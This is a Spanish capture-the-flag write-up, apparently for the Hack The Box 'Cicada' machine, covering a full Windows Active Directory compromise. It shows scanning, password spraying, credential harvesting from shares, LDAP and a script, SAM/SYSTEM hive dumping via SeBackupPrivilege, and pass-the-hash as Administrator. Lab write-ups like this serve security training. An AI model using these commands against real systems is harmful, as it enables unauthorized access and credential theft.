Cicada
OS: Windows
Dificultad: Fácil
Puntos: 20
Nmap Scan
nmap -v -p- --min-rate=5000 10.129.136.189nmap -vvv -p 53,88,135,139,389,445,464,636,3268,3269,5985 -sV -sC -oN nmap.txt 10.129.136.189Nmap scan report for 10.129.136.189
Host is up (0.026s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-01 14:21:31Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
|_ssl-date: TLS randomness does not represent time
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=CICADA-DC.cicada.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:CICADA-DC.cicada.htb
| Issuer: commonName=CICADA-DC-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-08-22T20:24:16
| Not valid after: 2025-08-22T20:24:16
| MD5: 9ec5:1a23:40ef:b5b8:3d2c:39d8:447d:db65
|_SHA-1: 2c93:6d7b:cfd8:11b9:9f71:1a5a:155d:88d3:4a52:157a
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windowsEnumeracion
┌──(root㉿kali)-[~/Cicada]
└─# smbclient -L 10.129.136.189
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share┌──(root㉿kali)-[~/Cicada]
└─# smbclient //10.129.136.189/HR
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 08:29:09 2024
.. D 0 Thu Mar 14 08:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 13:31:48 2024
4168447 blocks of size 4096. 332850 blocks available
smb: \> get "Notice from HR.txt"
getting file \Notice from HR.txt of size 1266 as Notice from HR.txt (11.2 KiloBytes/sec) (average 11.2 KiloBytes/sec)
smb: \> exitEl archivo contiene un password.
Your default password is: Cicada$M6Corpb*@Lp#nZp!8Enumeramos usuarios con la netexec.
┌──(root㉿kali)-[~/Cicada]
└─# netexec smb 10.129.136.189 -u 'support' -p '' --rid-brute
SMB 10.129.136.189 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.136.189 445 CICADA-DC [+] cicada.htb\support:
SMB 10.129.136.189 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.136.189 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB 10.129.136.189 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB 10.129.136.189 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB 10.129.136.189 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB 10.129.136.189 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
SMB 10.129.136.189 445 CICADA-DC 514: CICADA\Domain Guests (SidTypeGroup)
SMB 10.129.136.189 445 CICADA-DC 515: CICADA\Domain Computers (SidTypeGroup)
SMB 10.129.136.189 445 CICADA-DC 516: CICADA\Domain Controllers (SidTypeGroup)
SMB 10.129.136.189 445 CICADA-DC 517: CICADA\Cert Publishers (SidTypeAlias)
SMB 10.129.136.189 445 CICADA-DC 518: CICADA\Schema Admins (SidTypeGroup)
SMB 10.129.136.189 445 CICADA-DC 519: CICADA\Enterprise Admins (SidTypeGroup)
SMB 10.129.136.189 445 CICADA-DC 520: CICADA\Group Policy Creator Owners (SidTypeGroup)
SMB 10.129.136.189 445 CICADA-DC 521: CICADA\Read-only Domain Controllers (SidTypeGroup)
SMB 10.129.136.189 445 CICADA-DC 522: CICADA\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.129.136.189 445 CICADA-DC 525: CICADA\Protected Users (SidTypeGroup)
SMB 10.129.136.189 445 CICADA-DC 526: CICADA\Key Admins (SidTypeGroup)
SMB 10.129.136.189 445 CICADA-DC 527: CICADA\Enterprise Key Admins (SidTypeGroup)
SMB 10.129.136.189 445 CICADA-DC 553: CICADA\RAS and IAS Servers (SidTypeAlias)
SMB 10.129.136.189 445 CICADA-DC 571: CICADA\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.129.136.189 445 CICADA-DC 572: CICADA\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.129.136.189 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB 10.129.136.189 445 CICADA-DC 1101: CICADA\DnsAdmins (Sjohn.smoulderidTypeAlias)
SMB 10.129.136.189 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB 10.129.136.189 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB 10.129.136.189 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB 10.129.136.189 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB 10.129.136.189 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB 10.129.136.189 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB 10.129.136.189 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB 10.129.136.189 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)Hacemos PasswordSpray de los usuarios.
┌──(root㉿kali)-[~/Cicada]
└─# netexec smb 10.129.136.189 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'
SMB 10.129.136.189 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.136.189 445 CICADA-DC [-] cicada.htb\john.smoulder:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.136.189 445 CICADA-DC [-] cicada.htb\sarah.dantelia:Cicada$M6Corpb*@Lp#nZp!8 STATUS_LOGON_FAILURE
SMB 10.129.136.189 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8michael.wrightson : Cicada$M6Corpb*@Lp#nZp!8Con estas credenciales podemos enumerar el servico LDAP.
┌──(root㉿kali)-[~/Cicada]
└─# netexec ldap 10.129.136.189 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users
SMB 10.129.136.189 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
LDAP 10.129.136.189 389 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
LDAP 10.129.136.189 389 CICADA-DC [*] Total records returned: 8
LDAP 10.129.136.189 389 CICADA-DC -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.136.189 389 CICADA-DC Administrator 2024-08-26 20:08:03 1 Built-in account for administering the computer/domain
LDAP 10.129.136.189 389 CICADA-DC Guest 2024-08-28 17:26:56 0 Built-in account for guest access to the computer/domain
LDAP 10.129.136.189 389 CICADA-DC krbtgt 2024-03-14 11:14:10 0 Key Distribution Center Service Account
LDAP 10.129.136.189 389 CICADA-DC john.smoulder 2024-03-14 12:17:29 1
LDAP 10.129.136.189 389 CICADA-DC sarah.dantelia 2024-03-14 12:17:29 1
LDAP 10.129.136.189 389 CICADA-DC michael.wrightson 2024-03-14 12:17:29 0
LDAP 10.129.136.189 389 CICADA-DC david.orelious 2024-03-14 12:17:29 0 Just in case I forget my password is aRt$Lp#7t*VQ!3
LDAP 10.129.136.189 389 CICADA-DC emily.oscars 2024-08-22 21:20:17 0Conseguimos otro password.
david.orelious : aRt$Lp#7t*VQ!3Ahora podemos acceder al recurso compartido DEV.
┌──(root㉿kali)-[~/Cicada]
└─# smbclient -U 'david.orelious' //10.129.136.189/DEV
Password for [WORKGROUP\david.orelious]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Mar 14 08:31:39 2024
.. D 0 Thu Mar 14 08:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 13:28:22 2024
4168447 blocks of size 4096. 331615 blocks available
smb: \> get Backup_script.ps1
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (5.1 KiloBytes/sec) (average 5.1 KiloBytes/sec)
smb: \>┌──(root㉿kali)-[~/Cicada]
└─# cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"Obtenemos una nueva cuenta y con esta nos podemos conectar remotamente.
┌──(root㉿kali)-[~/Cicada]
└─# evil-winrm -i 10.129.136.189 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> type ..\Desktop\user.txt
a3b2112b2526c894eaf0ba7e71fc99fePrivilege Escalation
El usuario tiene el privilegio SeBackupPrivilege con el que podemos hacer una copia del sistema para obtener hashes.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledCopiamos el archivo sam y system.
*Evil-WinRM* PS C:\> mkdir temp
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/1/2024 8:37 AM temp
*Evil-WinRM* PS C:\> reg save hklm\sam c:\temp\sam
The operation completed successfully.
*Evil-WinRM* PS C:\> reg save hklm\system c:\temp\system
The operation completed successfully.Los descargamos.
*Evil-WinRM* PS C:\> download c:\temp\sam .
Info: Downloading c:\temp\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\> download c:\temp\system .
Info: Downloading c:\temp\system to system
Info: Download successful!Utilizanso pypykatz obtenemos los hashes.
pypykatz registry --sam sam systemWARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work
WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: 3c2b033757a49110a9ee680b46e8d620
============== SAM hive secrets ==============
HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Nos conectamos con winrm para obtener root.
┌──(root㉿kali)-[~/Cicada]
└─# evil-winrm -i 10.129.136.189 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\desktop\root.txt
9aab554ab6ae2f802622addf8afb426bReferencias
https://github.com/Pennyw0rth/NetExec
https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/